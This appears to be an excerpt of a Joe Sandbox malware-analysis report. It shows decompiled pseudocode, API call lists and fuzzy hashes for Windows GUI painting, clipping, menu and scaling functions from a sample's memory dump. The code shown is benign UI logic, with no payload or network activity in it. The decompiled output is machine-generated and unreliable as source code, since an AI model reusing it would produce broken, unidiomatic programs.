							E027E9BA4(_v28.right - _t80, _v28.right, _v28.bottom - _t81,  &_v72, _v28.bottom);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t119 = _t119;
							FillRect(_v12,  &_v28, GetSysColorBrush(0xf));
						}
					}
					ExcludeClipRect(_v12, _v44.left + 2, _v44.top + 2, _v44.right - 2, _v44.bottom - 2);
					E0280B3EC( &_v56, 2);
					E0280B274(_t119,  &_v56, _v12, 0,  &_v44);
					_pop(_t107);
					 *[fs:eax] = _t107;
					_push(0x280b9b2);
					return ReleaseDC(E02833F7C(_v8), _v12);
				}
			}




















                          0x0280b851
                          0x0280b853
                          0x0280b859
                          0x0280b85b
                          0x0280b85e
                          0x0280b86b
                          0x0280b873
                          0x0280b9b8
                          0x0280b879
                          0x0280b886
                          0x0280b89b
                          0x0280b8ae
                          0x0280b8b3
                          0x0280b8b4
                          0x0280b8b9
                          0x0280b8bc
                          0x0280b8c6
                          0x0280b8c7
                          0x0280b8c8
                          0x0280b8c9
                          0x0280b8ca
                          0x0280b8cd
                          0x0280b8da
                          0x0280b8e4
                          0x0280b8ef
                          0x0280b8f8
                          0x0280b907
                          0x0280b921
                          0x0280b92d
                          0x0280b92e
                          0x0280b92f
                          0x0280b930
                          0x0280b931
                          0x0280b942
                          0x0280b942
                          0x0280b8e4
                          0x0280b967
                          0x0280b973
                          0x0280b986
                          0x0280b98d
                          0x0280b990
                          0x0280b993
                          0x0280b9aa
                          0x0280b9aa

                          APIs
                          • GetWindowLongA.USER32(00000000,000000EC), ref: 0280B86B
                          • GetWindowRect.USER32(00000000,?), ref: 0280B886
                          • OffsetRect.USER32(?,?,?), ref: 0280B89B
                          • GetWindowDC.USER32(00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0280B8A9
                          • GetWindowLongA.USER32(00000000,000000F0), ref: 0280B8DA
                          • GetSystemMetrics.USER32(00000002), ref: 0280B8EF
                          • GetSystemMetrics.USER32(00000003), ref: 0280B8F8
                          • InflateRect.USER32(?,000000FE,000000FE), ref: 0280B907
                          • GetSysColorBrush.USER32(0000000F), ref: 0280B934
                          • FillRect.USER32(?,?,00000000), ref: 0280B942
                          • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,0280B9AB,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0280B967
                          • ReleaseDC.USER32(00000000,?), ref: 0280B9A5
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Rect$Window$LongMetricsSystem$BrushClipColorExcludeFillInflateOffsetRelease
                          • String ID:
                          • API String ID: 19621357-0
                          • Opcode ID: dd3b8bf5825cceed9d69c52937edff2d9160b7fbd8c008cb9cef823bcc16fb13
                          • Instruction ID: dd5175f33ec712d1c6eeb135d99bbb76e7a4c058a0a16ce2288d5d5faf62968b
                          • Opcode Fuzzy Hash: dd3b8bf5825cceed9d69c52937edff2d9160b7fbd8c008cb9cef823bcc16fb13
                          • Instruction Fuzzy Hash: D6411C76A00108AADB02EBA8DD85EEFB7BEEF49314F100550F514F7290DB35AE418BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027F5180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109COMMON
                          Download Yara Rule
                          C-Code - Quality: 88%
                          			E027F5180(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
				struct tagPOINT _v12;
				int _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t60;
				int _t61;
				RECT* _t64;
				struct HDC__* _t65;

				_t64 = _a8;
				_t65 = _a4;
				if( *0x28658bf != 0) {
					_t61 = 0;
					if(_a12 == 0) {
						L14:
						return _t61;
					}
					_v32.left = 0;
					_v32.top = 0;
					_v32.right = GetSystemMetrics(0);
					_v32.bottom = GetSystemMetrics(1);
					if(_t65 == 0) {
						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
							L13:
							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
						} else {
							_t61 = 1;
						}
						goto L14;
					}
					_v16 = GetClipBox(_t65,  &_v48);
					if(GetDCOrgEx(_t65,  &_v12) == 0) {
						goto L14;
					}
					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
							goto L13;
						}
						if(_v16 == 1) {
							_t61 = 1;
						}
						goto L14;
					} else {
						goto L13;
					}
				}
				 *0x28658ac = E027F4BD4(7, _t60,  *0x28658ac, _t64, _t65);
				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
				goto L14;
			}















                          0x027f5189
                          0x027f518c
                          0x027f5196
                          0x027f51c6
                          0x027f51cc
                          0x027f5288
                          0x027f5290
                          0x027f5290
                          0x027f51d4
                          0x027f51d9
                          0x027f51e4
                          0x027f51ef
                          0x027f51f4
                          0x027f525d
                          0x027f5275
                          0x027f5286
                          0x027f5271
                          0x027f5271
                          0x027f5271
                          0x00000000
                          0x027f525d
                          0x027f5200
                          0x027f520f
                          0x00000000
                          0x00000000
                          0x027f5221
                          0x027f5239
                          0x027f524f
                          0x00000000
                          0x00000000
                          0x027f5255
                          0x027f5257
                          0x027f5257
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x027f5239
                          0x027f51aa
                          0x027f51bf
                          0x00000000

                          APIs
                          • EnumDisplayMonitors.USER32(?,?,?,?), ref: 027F51B9
                          • GetSystemMetrics.USER32(00000000), ref: 027F51DE
                          • GetSystemMetrics.USER32(00000001), ref: 027F51E9
                          • GetClipBox.GDI32(?,?), ref: 027F51FB
                          • GetDCOrgEx.GDI32(?,?), ref: 027F5208
                          • OffsetRect.USER32(?,?,?), ref: 027F5221
                          • IntersectRect.USER32(?,?,?), ref: 027F5232
                          • IntersectRect.USER32(?,?,?), ref: 027F5248
                            • Part of subcall function 027F4BD4: GetProcAddress.KERNEL32(75550000,00000000), ref: 027F4C54
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
                          • String ID: EnumDisplayMonitors
                          • API String ID: 362875416-2491903729
                          • Opcode ID: bd0a1e25885e2c9767976579d29eb2ae4d1806da749567e1264c18c91e04d6ae
                          • Instruction ID: 8fbc7d31b8e7f1ac34f9b5d283108d2ec7cd734b6fd48e9afaa5892bfa86ca79
                          • Opcode Fuzzy Hash: bd0a1e25885e2c9767976579d29eb2ae4d1806da749567e1264c18c91e04d6ae
                          • Instruction Fuzzy Hash: CA3100B6E04109AFDB51DEE4D848AFFB7BCAB49301F404626EA15E3240E73499018BA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0283210C Relevance: 16.6, APIs: 11, Instructions: 133windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 88%
                          			E0283210C(intOrPtr* __eax, void* __edx) {
				struct HDC__* _v8;
				struct HBITMAP__* _v12;
				void* _v16;
				struct tagPAINTSTRUCT _v80;
				int _v84;
				void* _v96;
				int _v104;
				void* _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t38;
				struct HDC__* _t59;
				intOrPtr* _t88;
				intOrPtr _t107;
				void* _t108;
				struct HDC__* _t110;
				void* _t113;
				void* _t116;
				void* _t118;
				intOrPtr _t119;

				_t116 = _t118;
				_t119 = _t118 + 0xffffff94;
				_push(_t108);
				_t113 = __edx;
				_t88 = __eax;
				if( *((char*)(__eax + 0x1f8)) == 0 ||  *((intOrPtr*)(__edx + 4)) != 0) {
					if(( *(_t88 + 0x55) & 0x00000001) != 0 || E02830CAC(_t88) != 0) {
						_t38 = E02831C30(_t88, _t88, _t113, _t108, _t113);
					} else {
						_t38 =  *((intOrPtr*)( *_t88 - 0x10))();
					}
					return _t38;
				} else {
					_t110 = GetDC(0);
					 *((intOrPtr*)( *_t88 + 0x44))();
					 *((intOrPtr*)( *_t88 + 0x44))();
					_v12 = CreateCompatibleBitmap(_t110, _v104, _v84);
					ReleaseDC(0, _t110);
					_v8 = CreateCompatibleDC(0);
					_v16 = SelectObject(_v8, _v12);
					 *[fs:eax] = _t119;
					_t59 = BeginPaint(E02833F7C(_t88),  &_v80);
					E0282E93C(_t88, _v8, 0x14, _v8);
					 *((intOrPtr*)(_t113 + 4)) = _v8;
					E0283210C(_t88, _t113);
					 *((intOrPtr*)(_t113 + 4)) = 0;
					 *((intOrPtr*)( *_t88 + 0x44))( *[fs:eax], 0x283225e, _t116);
					 *((intOrPtr*)( *_t88 + 0x44))();
					BitBlt(_t59, 0, 0, _v104, _v84, _v8, 0, 0, 0xcc0020);
					EndPaint(E02833F7C(_t88),  &_v80);
					_pop(_t107);
					 *[fs:eax] = _t107;
					_push(0x2832265);
					SelectObject(_v8, _v16);
					DeleteDC(_v8);
					return DeleteObject(_v12);
				}
			}

























                          0x0283210d
                          0x0283210f
                          0x02832114
                          0x02832115
                          0x02832117
                          0x02832120
                          0x0283212c
                          0x0283214b
                          0x02832139
                          0x0283213f
                          0x0283213f
                          0x0283226b
                          0x02832155
                          0x0283215c
                          0x02832165
                          0x02832173
                          0x02832180
                          0x02832186
                          0x02832192
                          0x028321a2
                          0x028321b0
                          0x028321bf
                          0x028321d4
                          0x028321dc
                          0x028321e3
                          0x028321ea
                          0x02832201
                          0x0283220f
                          0x0283221b
                          0x0283222c
                          0x02832233
                          0x02832236
                          0x02832239
                          0x02832246
                          0x0283224f
                          0x0283225d
                          0x0283225d

                          APIs
                          • GetDC.USER32(00000000), ref: 02832157
                          • CreateCompatibleBitmap.GDI32(00000000,?), ref: 0283217B
                          • ReleaseDC.USER32(00000000,00000000), ref: 02832186
                          • CreateCompatibleDC.GDI32(00000000), ref: 0283218D
                          • SelectObject.GDI32(00000000,02818D39), ref: 0283219D
                          • BeginPaint.USER32(00000000,?,00000000,0283225E,?,00000000,02818D39,00000000,00000000,00000000,00000000,?), ref: 028321BF
                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,02818D39,00000000,00000000), ref: 0283221B
                          • EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,02818D39,00000000,00000000,00000000,00000000,?), ref: 0283222C
                          • SelectObject.GDI32(00000000,?), ref: 02832246
                          • DeleteDC.GDI32(00000000), ref: 0283224F
                          • DeleteObject.GDI32(02818D39), ref: 02832258
                            • Part of subcall function 02831C30: BeginPaint.USER32(00000000,?), ref: 02831C56
                            • Part of subcall function 02831C30: EndPaint.USER32(00000000,?,02831D57), ref: 02831D4A
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Paint$Object$BeginCompatibleCreateDeleteSelect$BitmapRelease
                          • String ID:
                          • API String ID: 3867285559-0
                          • Opcode ID: ce22d067f6a6e1b912e1d80b92525da941553453a1ba58c3dd3c446508176d18
                          • Instruction ID: b1ba6b8729a1c8661ce565380430381e57c3f89113177fd56779a566ce92393e
                          • Opcode Fuzzy Hash: ce22d067f6a6e1b912e1d80b92525da941553453a1ba58c3dd3c446508176d18
                          • Instruction Fuzzy Hash: BE410D79B00208AFDB11EFA8DD88BAEB7FDAF48704F104469B909DB244DA75ED05CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02831D88 Relevance: 15.2, APIs: 10, Instructions: 177windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E02831D88(void* __eax, void* __ecx, struct HDC__* __edx) {
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _v68;
				int _v80;
				int _t79;
				void* _t134;
				int _t135;
				void* _t136;
				void* _t159;
				void* _t160;
				void* _t161;
				struct HDC__* _t162;
				intOrPtr* _t163;

				_t163 =  &(_v44.bottom);
				_t134 = __ecx;
				_t162 = __edx;
				_t161 = __eax;
				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *((intOrPtr*)(__eax + 0x17c)) != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x17c)))) + 0x20))();
				}
				_t78 =  *((intOrPtr*)(_t161 + 0x198));
				if( *((intOrPtr*)(_t161 + 0x198)) == 0) {
					L17:
					_t79 =  *(_t161 + 0x19c);
					if(_t79 == 0) {
						L27:
						return _t79;
					}
					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
					if(_t79 < 0) {
						goto L27;
					}
					_v44.right = _t79 + 1;
					_t159 = 0;
					do {
						_t79 = E027EB1E0( *(_t161 + 0x19c), _t159);
						_t135 = _t79;
						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
							_v44.left = CreateSolidBrush(E027F7018(0xff000010));
							E027E9BA4( *((intOrPtr*)(_t135 + 0x40)) - 1,  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
							FrameRect(_t162,  &_v44, _v44);
							DeleteObject(_v60.right);
							_v60.left = CreateSolidBrush(E027F7018(0xff000014));
							E027E9BA4( *((intOrPtr*)(_t135 + 0x40)),  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
							FrameRect(_t162,  &_v60, _v60);
							_t79 = DeleteObject(_v68);
						}
						_t159 = _t159 + 1;
						_t75 =  &(_v44.right);
						 *_t75 = _v44.right - 1;
					} while ( *_t75 != 0);
					goto L27;
				}
				_t160 = 0;
				if(_t134 != 0) {
					_t160 = E027EB23C(_t78, _t134);
					if(_t160 < 0) {
						_t160 = 0;
					}
				}
				 *_t163 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x198)) + 8));
				if(_t160 <  *_t163) {
					do {
						_t136 = E027EB1E0( *((intOrPtr*)(_t161 + 0x198)), _t160);
						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
							E027E9BA4( *((intOrPtr*)(_t136 + 0x40)),  *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
							if(RectVisible(_t162,  &(_v44.top)) != 0) {
								if(( *(_t161 + 0x54) & 0x00000080) != 0) {
									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
								}
								_v60.top = SaveDC(_t162);
								E0282C064(_t162,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
								IntersectClipRect(_t162, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
								E0282E93C(_t136, _t162, 0xf, 0);
								RestoreDC(_t162, _v80);
								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
							}
						}
						_t160 = _t160 + 1;
					} while (_t160 < _v60.top);
				}
			}
















                          0x02831d8c
                          0x02831d8f
                          0x02831d91
                          0x02831d93
                          0x02831d9c
                          0x02831dba
                          0x02831dba
                          0x02831dbd
                          0x02831dc5
                          0x02831eaa
                          0x02831eaa
                          0x02831eb2
                          0x02831fb7
                          0x02831fb7
                          0x02831fb7
                          0x02831ebb
                          0x02831ebe
                          0x00000000
                          0x00000000
                          0x02831ec5
                          0x02831ec9
                          0x02831ecb
                          0x02831ed3
                          0x02831ed8
                          0x02831ee1
                          0x02831f1b
                          0x02831f3e
                          0x02831f49
                          0x02831f53
                          0x02831f68
                          0x02831f8b
                          0x02831f96
                          0x02831fa0
                          0x02831fa0
                          0x02831fa5
                          0x02831fa6
                          0x02831fa6
                          0x02831fa6
                          0x00000000
                          0x02831ecb
                          0x02831dcb
                          0x02831dcf
                          0x02831dd8
                          0x02831ddc
                          0x02831dde
                          0x02831dde
                          0x02831ddc
                          0x02831de9
                          0x02831def
                          0x02831df5
                          0x02831e02
                          0x02831e08
                          0x02831e36
                          0x02831e48
                          0x02831e4e
                          0x02831e50
                          0x02831e50
                          0x02831e5c
                          0x02831e68
                          0x02831e7a
                          0x02831e8a
                          0x02831e95
                          0x02831e9a
                          0x02831e9a
                          0x02831e48
                          0x02831ea0
                          0x02831ea1
                          0x02831df5

                          APIs
                          • RectVisible.GDI32(55DFEBFF,?), ref: 02831E41
                          • SaveDC.GDI32(55DFEBFF), ref: 02831E57
                          • IntersectClipRect.GDI32(55DFEBFF,00000000,00000000,?,?), ref: 02831E7A
                          • RestoreDC.GDI32(55DFEBFF,55DFEBFF), ref: 02831E95
                          • CreateSolidBrush.GDI32(00000000), ref: 02831F16
                          • FrameRect.USER32(55DFEBFF,?,?), ref: 02831F49
                          • DeleteObject.GDI32(?), ref: 02831F53
                          • CreateSolidBrush.GDI32(00000000), ref: 02831F63
                          • FrameRect.USER32(55DFEBFF,?,00000000), ref: 02831F96
                          • DeleteObject.GDI32(00000000), ref: 02831FA0
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                          • String ID:
                          • API String ID: 375863564-0
                          • Opcode ID: 761338f981581ffe745c768f89a24fa613c36c75ac7ea6be38cbc274a34e28f9
                          • Instruction ID: 6ccca9c3cc5eacda6a4c48e43c93a46e9b1f433cb877068f9b0d5b6c1516b223
                          • Opcode Fuzzy Hash: 761338f981581ffe745c768f89a24fa613c36c75ac7ea6be38cbc274a34e28f9
                          • Instruction Fuzzy Hash: D25191792043449FDB16DF28C8C8B6B77E9AF48704F044458EE8DCB25ADB75E845CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02818E6C Relevance: 15.1, APIs: 10, Instructions: 83windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E02818E6C(intOrPtr _a4) {
				struct HMENU__* _v8;
				intOrPtr _t38;

				_t2 = _a4 - 4; // 0xfffffeb1
				_t38 =  *_t2;
				if( *((char*)(_t38 + 0x229)) != 0) {
					_t5 = _a4 - 4; // 0xfffffeb1
					_t38 =  *_t5;
					if(( *(_t38 + 0x228) & 0x00000001) != 0) {
						_t10 = _a4 - 4; // 0xfffffeb1
						_t38 =  *_t10;
						if( *((char*)(_t38 + 0x22f)) != 1) {
							_t13 = _a4 - 4; // 0xfffffeb1
							_v8 = GetSystemMenu(E02833F7C( *_t13), 0);
							_t16 = _a4 - 4; // 0xfffffeb1
							if( *((char*)( *_t16 + 0x229)) == 3) {
								DeleteMenu(_v8, 0xf130, 0);
								DeleteMenu(_v8, 7, 0x400);
								DeleteMenu(_v8, 5, 0x400);
								DeleteMenu(_v8, 0xf030, 0);
								DeleteMenu(_v8, 0xf020, 0);
								DeleteMenu(_v8, 0xf000, 0);
								return DeleteMenu(_v8, 0xf120, 0);
							}
							_t26 = _a4 - 4; // 0xfffffeb1
							if(( *( *_t26 + 0x228) & 0x00000002) == 0) {
								EnableMenuItem(_v8, 0xf020, 1);
							}
							_t32 = _a4 - 4; // 0xfffffeb1
							_t38 =  *_t32;
							if(( *(_t38 + 0x228) & 0x00000004) == 0) {
								return EnableMenuItem(_v8, 0xf030, 1);
							}
						}
					}
				}
				return _t38;
			}





                          0x02818e73
                          0x02818e73
                          0x02818e7d
                          0x02818e86
                          0x02818e86
                          0x02818e90
                          0x02818e99
                          0x02818e99
                          0x02818ea3
                          0x02818eae
                          0x02818ebc
                          0x02818ec2
                          0x02818ecc
                          0x02818ed9
                          0x02818ee9
                          0x02818ef9
                          0x02818f09
                          0x02818f19
                          0x02818f29
                          0x00000000
                          0x02818f39
                          0x02818f43
                          0x02818f4d
                          0x02818f5a
                          0x02818f5a
                          0x02818f62
                          0x02818f62
                          0x02818f6c
                          0x00000000
                          0x02818f79
                          0x02818f6c
                          0x02818ea3
                          0x02818e90
                          0x02818f80

                          APIs
                          • GetSystemMenu.USER32(00000000,00000000), ref: 02818EB7
                          • DeleteMenu.USER32(?,0000F130,00000000,00000000,00000000), ref: 02818ED9
                          • DeleteMenu.USER32(?,00000007,00000400,?,0000F130,00000000,00000000,00000000), ref: 02818EE9
                          • DeleteMenu.USER32(?,00000005,00000400,?,00000007,00000400,?,0000F130,00000000,00000000,00000000), ref: 02818EF9
                          • DeleteMenu.USER32(?,0000F030,00000000,?,00000005,00000400,?,00000007,00000400,?,0000F130,00000000,00000000,00000000), ref: 02818F09
                          • DeleteMenu.USER32(?,0000F020,00000000,?,0000F030,00000000,?,00000005,00000400,?,00000007,00000400,?,0000F130,00000000,00000000), ref: 02818F19
                          • DeleteMenu.USER32(?,0000F000,00000000,?,0000F020,00000000,?,0000F030,00000000,?,00000005,00000400,?,00000007,00000400,?), ref: 02818F29
                          • DeleteMenu.USER32(?,0000F120,00000000,?,0000F000,00000000,?,0000F020,00000000,?,0000F030,00000000,?,00000005,00000400,?), ref: 02818F39
                          • EnableMenuItem.USER32(?,0000F020,00000001), ref: 02818F5A
                          • EnableMenuItem.USER32(?,0000F030,00000001), ref: 02818F79
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Menu$Delete$EnableItem$System
                          • String ID:
                          • API String ID: 3985193851-0
                          • Opcode ID: 4b8013cda5f35cb945b127675c6f6975a68485a3bd6933c3827328d5857be857
                          • Instruction ID: d64e40244b235084cfaebef899cb7016aa40b9fe29e215de95a775bcf5e6bec3
                          • Opcode Fuzzy Hash: 4b8013cda5f35cb945b127675c6f6975a68485a3bd6933c3827328d5857be857
                          • Instruction Fuzzy Hash: B5311C78744305BBEB11DBA8DD4EF997BFA9B04704F104090B648EF6D1C7B5AA809B48
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0282D36C Relevance: 13.6, APIs: 9, Instructions: 150COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0282D36C(intOrPtr* __eax, int __ecx, int __edx) {
				char _t62;
				signed int _t64;
				signed int _t65;
				signed char _t107;
				intOrPtr _t113;
				intOrPtr _t114;
				int _t117;
				intOrPtr* _t118;
				int _t119;
				int* _t121;

				 *_t121 = __ecx;
				_t117 = __edx;
				_t118 = __eax;
				if(__edx ==  *_t121) {
					L29:
					_t62 =  *0x282d518; // 0x0
					 *((char*)(_t118 + 0x98)) = _t62;
					return _t62;
				}
				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
					_t107 =  *0x282d510; // 0x1f
				} else {
					_t4 = _t118 + 0x98; // 0x21880c6
					_t107 =  *_t4;
				}
				if((_t107 & 0x00000001) == 0) {
					_t8 = _t118 + 0x40; // 0xc60001d5
					_t119 =  *_t8;
				} else {
					_t7 = _t118 + 0x40; // 0xc60001d5
					_t119 = MulDiv( *_t7, _t117,  *_t121);
				}
				if((_t107 & 0x00000002) == 0) {
					_t13 = _t118 + 0x44; // 0x8b00f745
					_t121[1] =  *_t13;
				} else {
					_t11 = _t118 + 0x44; // 0x8b00f745
					_t121[1] = MulDiv( *_t11, _t117,  *_t121);
				}
				if((_t107 & 0x00000004) == 0 || ( *(_t118 + 0x51) & 0x00000001) != 0) {
					_t27 = _t118 + 0x48; // 0x408bf845
					_t64 =  *_t27;
					_t121[2] = _t64;
				} else {
					if((_t107 & 0x00000001) == 0) {
						_t25 = _t118 + 0x48; // 0x408bf845
						_t64 = MulDiv( *_t25, _t117,  *_t121);
						_t121[2] = _t64;
					} else {
						_t22 = _t118 + 0x40; // 0xc60001d5
						_t23 = _t118 + 0x48; // 0x408bf845
						_t64 = MulDiv( *_t22 +  *_t23, _t117,  *_t121) - _t119;
						_t121[2] = _t64;
					}
				}
				_t65 = _t64 & 0xffffff00 | (_t107 & 0x00000008) != 0x00000000;
				if(_t65 == 0 || ( *(_t118 + 0x51) & 0x00000002) != 0) {
					_t46 = _t118 + 0x4c; // 0x1e88304
					_t121[3] =  *_t46;
				} else {
					if(_t65 == 0) {
						_t44 = _t118 + 0x44; // 0x8b00f745
						_t121[3] = MulDiv( *_t44, _t117,  *_t121);
					} else {
						_t40 = _t118 + 0x44; // 0x8b00f745
						_t41 = _t118 + 0x4c; // 0x1e88304
						_t121[3] = MulDiv( *_t40 +  *_t41, _t117,  *_t121) - _t121[1];
					}
				}
				 *((intOrPtr*)( *_t118 + 0x84))(_t121[4], _t121[2]);
				_t113 =  *0x282d518; // 0x0
				if(_t113 != (_t107 &  *0x282d514)) {
					_t52 = _t118 + 0x90; // 0xebfffbe9
					 *(_t118 + 0x90) = MulDiv( *_t52, _t117,  *_t121);
				}
				_t114 =  *0x282d518; // 0x0
				if(_t114 != (_t107 &  *0x282d51c)) {
					_t54 = _t118 + 0x94; // 0xfc458bef
					 *(_t118 + 0x94) = MulDiv( *_t54, _t117,  *_t121);
				}
				if( *((char*)(_t118 + 0x59)) == 0 && (_t107 & 0x00000010) != 0) {
					_t59 = _t118 + 0x68; // 0xf7558a02
					E027F7778( *_t59, MulDiv(E027F775C( *_t59), _t117,  *_t121));
				}
				goto L29;
			}













                          0x0282d373
                          0x0282d376
                          0x0282d378
                          0x0282d37d
                          0x0282d4fa
                          0x0282d4fa
                          0x0282d4ff
                          0x0282d50c
                          0x0282d50c
                          0x0282d387
                          0x0282d391
                          0x0282d389
                          0x0282d389
                          0x0282d389
                          0x0282d389
                          0x0282d39a
                          0x0282d3ae
                          0x0282d3ae
                          0x0282d39c
                          0x0282d3a1
                          0x0282d3aa
                          0x0282d3aa
                          0x0282d3b4
                          0x0282d3ca
                          0x0282d3cd
                          0x0282d3b6
                          0x0282d3bb
                          0x0282d3c4
                          0x0282d3c4
                          0x0282d3d4
                          0x0282d40e
                          0x0282d40e
                          0x0282d411
                          0x0282d3dc
                          0x0282d3df
                          0x0282d3ff
                          0x0282d403
                          0x0282d408
                          0x0282d3e1
                          0x0282d3e6
                          0x0282d3e9
                          0x0282d3f2
                          0x0282d3f4
                          0x0282d3f4
                          0x0282d3df
                          0x0282d418
                          0x0282d41d
                          0x0282d45e
                          0x0282d461
                          0x0282d425
                          0x0282d42d
                          0x0282d44f
                          0x0282d458
                          0x0282d42f
                          0x0282d434
                          0x0282d437
                          0x0282d444
                          0x0282d444
                          0x0282d42d
                          0x0282d479
                          0x0282d487
                          0x0282d48f
                          0x0282d496
                          0x0282d4a2
                          0x0282d4a2
                          0x0282d4b0
                          0x0282d4b8
                          0x0282d4bf
                          0x0282d4cb
                          0x0282d4cb
                          0x0282d4d5
                          0x0282d4e1
                          0x0282d4f5
                          0x0282d4f5
                          0x00000000

                          APIs
                          • MulDiv.KERNEL32(C60001D5,?,02814F77), ref: 0282D3A5
